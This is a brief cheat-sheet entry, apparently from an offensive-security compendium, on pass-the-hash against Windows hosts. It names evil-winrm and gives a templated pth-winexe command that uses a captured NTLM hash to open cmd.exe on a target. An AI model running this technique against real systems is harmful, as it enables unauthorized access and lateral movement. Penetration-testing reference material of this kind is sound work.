killchain-compendium/exploit/windows/docs/pass_the_hash.md

Pass the Hash

• Authenticate with retrieved hash
• User evil-winrm or

pth-winexe -U 'admin%hash' //<target-IP> cmd.exe